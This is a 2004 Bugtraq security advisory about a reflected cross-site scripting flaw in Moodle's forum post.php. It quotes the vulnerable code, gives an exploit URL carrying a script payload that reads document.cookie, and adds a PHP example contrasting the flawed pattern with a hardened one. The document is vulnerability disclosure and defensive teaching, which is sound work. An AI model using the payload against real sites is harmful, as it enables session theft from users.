Message-ID: <20040806212329.3966.qmail@www.securityfocus.com>
Date: 6 Aug 2004 21:23:29 -0000
From: Javier Ubilla Brenni <javierubilla@...mac.com>
To: bugtraq@...urityfocus.com
Subject: xss in moodle (post.php)

+--------------------------------+
|                                | 
| XSS in Moodle < 1.3 (post.php) |
|                                |
+--------------------------------+

Author: Javier Ubilla Brenni <javierubilla[at]spymac.com>
Date: 02/08/04

Software Description:
~~~~~~~~~~~~~~~~~~~~

"Moodle is a course management system (CMS) - a software package designed to help educators create quality online courses."
www.moodle.org

Bug:
~~~

post.php (mod/forum/post.php) is vulnerable to a reflected XSS attack.
The bug is in the handling of the $reply request variable:

/* Beginning of vulnerable code */

    } else if (isset($reply)) {      // User is writing a new reply

        if (! $parent = forum_get_post_full($reply)) {
            error("Parent post ID was incorrect ($reply)");
        }
        if (! $discussion = get_record("forum_discussions", "id", $parent->discussion)) {
            error("This post is not part of a discussion! ($reply)");
        }
        if (! $forum = get_record("forum", "id", $discussion->forum)) {
            error("The forum number was incorrect ($discussion->forum)");
        }
        if (! $course = get_record("course", "id", $discussion->course)) {
            error("The course number was incorrect ($discussion->course)");
        }

        if (! forum_user_can_post($forum)) {
            error("Sorry, but you can not post in this forum.");
        }

        if ($cm = get_coursemodule_from_instance("forum", $forum->id, $course->id)) {
            if (groupmode($course, $cm) and !isteacheredit($course->id)) {   // Make sure user can post here
                if (mygroupid($course->id) != $discussion->groupid) {
                    error("Sorry, but you can not post in this discussion.");
                }
            }
            if (!$cm->visible and !isteacher($course->id)) {
                error(get_string("activityiscurrentlyhidden"));
            }
        }

/* End of vulnerable code */

Here is the bug:

if (! $parent = forum_get_post_full($reply)) {
            error("Parent post ID was incorrect ($reply)");

$reply is taken from the request and is never validated as a post ID or
escaped. When no post matches it (as is the case for any non-numeric
value), the lookup fails and the raw value is interpolated into the
error() message, which is rendered back to the browser as HTML. Any
script in $reply therefore executes in the context of the Moodle site.

Exploit:
~~~~~~~~

http://www.vulnerable.com/moodle/mod/forum/post.php?reply=%3Cscript%3Ealert(document.cookie);%3C/script%3E
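The following is an added example, not code from Moodle or from the
advisory author. It reproduces the reflection in the "Bug" section and
the payload from the "Exploit" URL in a stand-alone script, and places a
hardened version beside it. The forum_get_post_full_stub() lookup and the
inline error markup are assumptions standing in for Moodle's own
functions; the payload is the one from the URL above.

```php
<?php
// Added example (not Moodle's code): the reflected-XSS pattern from
// post.php and one way to harden it. Run with: php example.php

// Constructed stand-in for forum_get_post_full(): only post 42 exists.
// Any other value (including an attacker's string) returns false, which
// is exactly the path that reaches the error message.
function forum_get_post_full_stub($id) {
    if ((string)$id === '42') {
        return (object)['id' => 42, 'discussion' => 7];
    }
    return false;
}

// Vulnerable pattern: the raw request value is interpolated into the
// message, and the message is emitted as HTML without escaping.
function render_reply_error_vulnerable($reply) {
    if (!$parent = forum_get_post_full_stub($reply)) {
        return "<p class=\"error\">Parent post ID was incorrect ($reply)</p>";
    }
    return "ok";
}

// Hardened pattern: (1) constrain the type at the trust boundary, since a
// post ID can only be a positive integer, and (2) escape on output even for
// values that passed validation, so a later refactor cannot reintroduce
// the reflection.
function render_reply_error_hardened($reply) {
    if (!preg_match('/^\d+$/', (string)$reply)) {
        // Reject outright; do not echo the bad value back.
        return '<p class="error">Parent post ID was incorrect</p>';
    }
    $id = (int)$reply;
    if (!$parent = forum_get_post_full_stub($id)) {
        $safe = htmlspecialchars((string)$id, ENT_QUOTES, 'UTF-8');
        return "<p class=\"error\">Parent post ID was incorrect ($safe)</p>";
    }
    return "ok";
}

// Payload from the exploit URL, URL-decoded (constructed test input).
$payload = '<script>alert(document.cookie);</script>';

echo "vulnerable: ", render_reply_error_vulnerable($payload), "\n";
echo "hardened:   ", render_reply_error_hardened($payload), "\n";
echo "valid id:   ", render_reply_error_hardened('42'), "\n";
```

In the vulnerable case the script tag arrives in the response body
verbatim; in the hardened case the non-numeric value is rejected before
it can be interpolated, and a numeric but non-existent ID is escaped
before rendering.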

Solution: 
~~~~~~~~~
Upgrade to the latest version (Moodle 1.3 or later, per the affected range above).

Vendor Status:
~~~~~~~~~~~~~~
Notified.

Credits:
~~~~~~~~
Bug found by Javier Ubilla and Ariel.
